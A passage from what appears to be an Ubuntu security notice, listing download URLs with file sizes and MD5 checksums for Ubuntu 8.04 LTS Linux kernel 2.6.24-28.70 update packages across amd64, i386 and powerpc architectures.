http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   280130 fb9c0d56db0d19a09524d36af51f4687\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.diff.gz\n      Size/MD5:  4813262 c1da8b33fcf63ededcc7ab2498e4c964\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.dsc\n      Size/MD5:     2258 f1f1a3629c40ac86e1b6172f2f3966cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz\n      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-28.70_all.deb\n      Size/MD5:  4932582 c75bb688dfed58df39fa72161bc6471c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28_2.6.24-28.70_all.deb\n      Size/MD5:  8149016 f80aeb18376bc0371a80a5acbbc4f042\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-28.70_all.deb\n      Size/MD5:   100904 3996ef6a1321c852676912837f7d9896\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-28.70_all.deb\n      Size/MD5: 46982104 a90fab943db79ec907e1cbf97c869092\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    28610 b861f6c6aa20728c83bbc0ec9ae239a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   224204 bd768c83d861caa00758232ec48f21f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    52648 663642186c3344039e31afcf1d88b48f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    40640 9ea576c926e3b3b68dd2f98f2c7b634f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    48646 d00ff865f10bd95cfe0d7f556fd96135\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    86332 d969a4a0657104af706645718743733d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    36314 98ac23e9bc91e2a54840f86bdd6e96ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   648768 458b6968f63bc8134e62c47e8a9be732\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   209944 04c1a8cd3bf7a25da0e78fbb8f90d111\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    39192 254eeda71366bfe9c3e4f7b56828f526\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    67984 29f9c63dbfd2f8f86ea71b2e9cae813b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   145448 689d507482ed8b85fd15f33d8bdfe737\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   287268 73a2edaf7afc4a65aa77e8995ed3b3e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:  2130812 20affc23d001c3a542b0adfa947e12eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_amd64.deb\n      Size/MD5:   675578 f6d7fe8d4eda5ed7e6e4edd2ab9fa2ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-openvz_2.6.24-28.70_amd64.deb\n      Size/MD5:  1254372 28e7eaca202b7aefa71b0e3e943d98a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_amd64.deb\n      Size/MD5:  1276462 1d5f451c0c43c965d585e34d0799dc77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_amd64.deb\n      Size/MD5:   675490 1ea0767f5025162a3350687d3977c1a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_amd64.deb\n      Size/MD5:  1086568 643d57e3d1cbb403787588819535ba3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_amd64.deb\n      Size/MD5: 17815434 ca2be2f4f00cd6c412beec384e6569d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-server_2.6.24-28.70_amd64.deb\n      Size/MD5: 17785084 624ae6cd24926052048734802477e137\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-generic_2.6.24-28.70_amd64.deb\n      Size/MD5: 21063276 fa087ed3f1b02b40b09dcfe89d45f73d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_amd64.deb\n      Size/MD5: 21435602 6dac3b165e31f9409240389cd33138ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_amd64.deb\n      Size/MD5:   709144 770ddfa645769cb3bbd36fd3213da463\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   263670 68ff4af3d2752a5d3965eff926890319\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   176414 a2b597847575190f35acc23e2230fee8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   254100 6c70433fbed951cd97797092952efc2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:  1642020 5664065e58da802295747e9c7c21b698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   143712 9a418be17d9afe53a5c7add5e90a28b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   164464 325e24198ba529100a5840ae1b0e2550\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   115852 6b155bc2fa1e59e144c57fad46a9acdd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    35060 73537c193f7fa3caf4007cc7348e9d28\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    64402 7760e6acdb5dda4b37ffd2fdd33ae658\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    69710 e6bcf4e9b94aaf83a2fd640e7364a34e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    21596 805227e007ba9dee7f04bf59aafb050c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:     8616 16e18d90244e835d0cbc5ae9c571c641\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    57230 06f30cc1a982671b53e5ca5c8d362aea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   103038 e571751777dc6cdc16f498add459f799\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:  1212558 c1a1947cc4f37c7b1479ece74e399a51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    45496 6f25ee67a63dfc757d82883b8162b268\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    12774 87bfa70fab065ed960c4249106df6219\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   499398 f50e6a5d591d124ea04b8e5c19683404\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    75052 f0253d9acbcf3f06cd0da60e7457c50d\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-openvz_2.6.24-28.70_amd64.deb\n      Size/MD5: 19262374 07ff7910c9e0ae1589fcaf93c1fb8acd\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_amd64.deb\n      Size/MD5: 17913162 6999b14fbb5cc112d64c9bfcbf475477\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_amd64.deb\n      Size/MD5: 18914794 a43117499bda8bccd98e185bde493749\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    23686 18bd8e09ccdca0f38c09197958ac5524\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    26796 46c1f483a8ad20c903e6354c68ee3389\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   218826 7a0c579b79c0d53f5d8cb405070c7e38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   220472 70a3539d19ebf9be4e7aed9141f64945\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    51924 ed915e6f13fa7a452e37810ed2589698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    52058 9c19d0affe1777b36dbcd835e95a72b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    38326 a9041a4039d457f26060784b609ba48c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    39078 393f5a163cbad634e8ba8ff17866e315\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    45994 0b5101e40b38f62278cca75a543f88d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    46166 8a3cd2550f4bc59515ee72f87d40e093\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    83250 4f57f0e75de3e3884c350df0a92646d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    83650 a29ba07db6908cc0dcfc6fa69c5d154f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    32396 e09725b6cd2edb1c99b954931ea30a3d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    32674 74a1c018bdd24a81f56e2f5ca76c86f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   637742 bb0af8a13cbf714fbbe316376f843bbb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   655916 503b7879d411c641f10d813d027e745c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   209854 ff86bb3742203e7bd44a5db87ce40361\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   213616 aa25de1453a8512619d62d66a98c783b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    46562 90e5237cdfc6e54b145b6e13ffdda47d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    47604 a9d621b700d5b56e23025357604f0487\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    62268 e00dd9915a2e92d3b4a7d7908b2194fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    63630 8d854a96bc559b4d87294ece7e79d03c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   130542 2e4009a596d1672486dee5aa3c8b2423\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   137028 da2ceb3ce4e2f0dcfd70cafba0d3eade\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   279082 63e74d6a553fb1725f661340eec544a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   277692 6cad6bee962600c17282346550b40ddd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  2012888 14bce971d0e20c69df861da2a2b960bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  2089262 98b4049286d60bfd3473da45ce332991\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-386_2.6.24-28.70_i386.deb\n      Size/MD5:   656922 58714a2e1fcc17e1fd89740aeee114f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_i386.deb\n      Size/MD5:   659532 f17700bc40e9e3e0d003225207da7c61\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-openvz_2.6.24-28.70_i386.deb\n      Size/MD5:  1244404 a00ae4dde9d6a921b17bda0e2fd86790\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_i386.deb\n      Size/MD5:  1264690 1e454c5f6a51b34c6f336d69269ba277\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_i386.deb\n      Size/MD5:   661210 385cebd0decb92d51bbea38c77f4ea27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-virtual_2.6.24-28.70_i386.deb\n      Size/MD5:   563854 3806e67c965a034bd8fd0873914baad5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_i386.deb\n      Size/MD5:  1061360 2a3ad99a1b108041578893878a8637a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-386_2.6.24-28.70_i386.deb\n      Size/MD5: 18384498 e8f5c0e7addd09241b7ef435a727637a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_i386.deb\n      Size/MD5: 18402466 0a06a6aad92ccebecf63da2c5966d277\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-server_2.6.24-28.70_i386.deb\n      Size/MD5: 18519954 bf9ef7f9445cfc22787b17d74d8d5900\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-virtual_2.6.24-28.70_i386.deb\n      Size/MD5:  8734136 0a8147e9d7bee6bc870bdc3208279eba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-386_2.6.24-28.70_i386.deb\n      Size/MD5: 25549924 8d030bc507ceb77d0fc6ae4bef22e118\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-generic_2.6.24-28.70_i386.deb\n      Size/MD5: 26364898 875fb60bc5bf8621b97c5574d07e55c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_i386.deb\n      Size/MD5: 27385008 9bec1d2b2b78583fcecedcd5c8ff3960\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-virtual_2.6.24-28.70_i386.deb\n      Size/MD5: 24877718 482b8cef0cf005a8483d11ed3b364964\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_i386.deb\n      Size/MD5:   709188 26cf4f59b5a9cb16b1c5288e9ecbea34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   258828 643f05e4db376d0bf7558133f91a3cfb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   264144 8770cbfb2e0e62965819cc57092f779e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   163268 f173ed5d6f19c886c3e05041e233e310\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   163024 6bb17cdade9c310a5d75eeca5908b7e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   236736 01de1ba5a354f340f81355f9e7ade04a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   244974 b86f7aaf1e9200b8f4e91d0455f311f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  1810636 aaf2ac4ebeb43a06da06b3d74abc4029\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  1827690 3f37ecbc8236e915a23a1c308613910e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   150834 dc34df5d314fbf390ef32a5695e2d4e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   143006 007db1ea88bc4bbf545e989cace61c1e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   156088 f046f30af354e4423fa7f6929efa9cfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   157156 daa0873f69f4fa6a3e2c6a3f70a98dad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   107216 11c20967c4aba25588cd33e41c62f577\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   108514 6d7f89b2f04c023440977996d99b1a09\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    32952 8f3f5c65701052b71bbcd200e9727d68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    33384 959583f504cdc92260a2e9cd7f154fba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    60690 46b409f735bcf21fbdcdd069421998bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    61148 2015776c1d327adfa0c00c77d14e7ca8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    82646 498f6209320fef7240940bd2eafe8f91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    82950 f8cd11b646c7b769865e9b0a6e563479\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    48532 fe22024e55539bf9079c05f25651599f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    48460 c070e99c0ec169067c45861ee64e7b00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:     8190 764f83aca8e039670b54ef1bd81bf5c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:     8438 40dd61311a71fb4f258b651d130fedc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    51108 f788272ef04244c5338f2eb833c68c5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    52946 6a3a99cd19757aa4a7e5bf9bf0cdcdd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    92156 a595388aea811859919835a4688eeec0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    92430 b1a87544de05790689dedd1408f95825\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  1443730 ba618401639337ede996442e8d85c657\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:  1426998 8d420db6ebadfd73a40ebb281f29b5e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    43244 264bc9d22f2d87c78d9ec1246b475907\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    42806 f16161dac125195d296c774de1c55ec7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    11404 882437fd9335b261cd2ce699edda462e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    12012 20555d5db134914f14f234201b050957\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   471770 7ea7283725e9fc661d40c780fe6e41a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:   473736 ab685d960b7ae1f4397f08dca1e3c00f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    70512 f3a95ca8d7726b950d0145ee38a3c90a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb\n      Size/MD5:    71380 592677ef1ec0f18ae8ac4704e7f6abb2\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-openvz_2.6.24-28.70_i386.deb\n      Size/MD5: 20246854 551dee4824d56cd54ebd6e2ceed36ce4\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_i386.deb\n      Size/MD5: 18544608 b047a5db139862e418b7c420e3584e18\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_i386.deb\n      Size/MD5: 18785694 ab4b0f6acb874628d207503ab96c72a5\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   334050 cb0a2732f7d57db2d4cf0aff024b0742\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   318522 845ff20c4f352d9accc1809e99f8a1a6\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    62720 da2d0022028e792d039fe638a6e511b2\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    73010 505d3154aa77be5a0e1ad64dfd6ae565\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    41444 0358500eff1aa734aa460223cffbd6fe\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    47828 41d9d6981ea0fb6efb885530e55d229a\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:    89502 13e293ff0eeef8f0a25532cbc1f6c59e\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb\n      Size/MD5:   105748 0276e7fc8215525f00c10d0d78729e74\n    